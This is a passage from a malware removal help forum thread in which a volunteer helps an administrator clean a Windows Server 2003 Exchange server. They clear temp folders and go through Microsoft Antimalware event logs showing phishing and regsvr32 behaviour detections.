https://drive.google.com/file/d/0B0gl0f4--8phRkFuTkx1RmowZ2M/view?usp=sharing

 

I do see:

C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Application Data\ (no temp folder)

C:\Documents and Settings\desktop\Application Data\ (no temp folder)

C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp

C:\Documents and Settings\desktop\Local Settings\Temp (already empty)

C:\Documents and Settings\Administrator\Application Data (no temp folder)

C:\Documents and Settings\Administrator\Local Settings\Temp

 

Thanks



#10 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 14 September 2017 - 11:38 AM

True, we're talking about a Windows Server 2003 machine here. The "Local Settings\Temp" folder is what we're looking for. This one specifically.
C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp



#11 adalta (Topic Starter, Members, 9 posts)

Posted 14 September 2017 - 01:23 PM

Ok, I've emptied the folder:

C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp.

 

What is odd is the lsmose.exe pops up again with the 9/11 date:

https://drive.google.com/file/d/0B0gl0f4--8phcVNxd0VwT2lZa0U/view?usp=sharing

 

Also, I'm seeing fewer MS Antimalware warnings. The two from today and two from yesterday are below. Are they false positives? We use Trend Micro ScanMail (SMEX) for email scanning.

 

What do you suggest my next steps are?

 

Event Viewer screen shot filtered to 1116 and text of the events below:

https://drive.google.com/open?id=0B0gl0f4--8phM1J0eDFjRlFXRm8

 

 

 

 

Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/14/2017
Time: 6:26:42 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VSGK1T9K.000->(SCRIPT0000)
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 

 

Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/14/2017
Time: 3:53:26 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VSBVO3HG.000
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 
 
 
Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/13/2017
Time: 6:27:28 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VS1SHSHP.000->(SCRIPT0000)
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 
 
 
 
Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/13/2017
Time: 3:53:59 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VS3L1VE2.000
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 

Thanks



#12 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 14 September 2017 - 01:26 PM

Looks like FP to me since they are located in a temp folder of Trend Micro, most likely where it drops suspicious/phishy emails.

If you open the Event Viewer, do you have any errors from lsmose.exe that date from September 12th, 13th and 14th?



#13 adalta (Topic Starter, Members, 9 posts)

Posted 14 September 2017 - 02:21 PM

No errors from lsmose.exe from September 12, 13, 14 although I do see the following regsvr32.exe entry from 9/12. All other entries during 9/12-9/14 deal with the C:\Program Files\Trend Micro\Smex\temp\ folder and the C:\Program Files\Trend Micro\Smex\SMEX_Master.exe file.

 

 

Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/12/2017
Time: 5:32:03 PM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: Behavior:Win32/Powemet.B!attk
  ID: 2147722898
  Severity: Severe
  Category: Suspicious Behavior
  Path: behavior:_pid:10044:94227975697806;process:_pid:10044
  Detection Origin: Unknown
  Detection Type: Concrete
  Detection Source: System
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\WINDOWS\system32\regsvr32.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 
Thanks


#14 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 14 September 2017 - 02:59 PM

And it occurred only once?



#15 adalta (Topic Starter, Members, 9 posts)

Posted 14 September 2017 - 04:55 PM

Yes, just once since 9/12/2017.

 

I'm not seeing anything abnormal in the Event Logs now. Are there any other scans or steps to confirm the infection was removed?





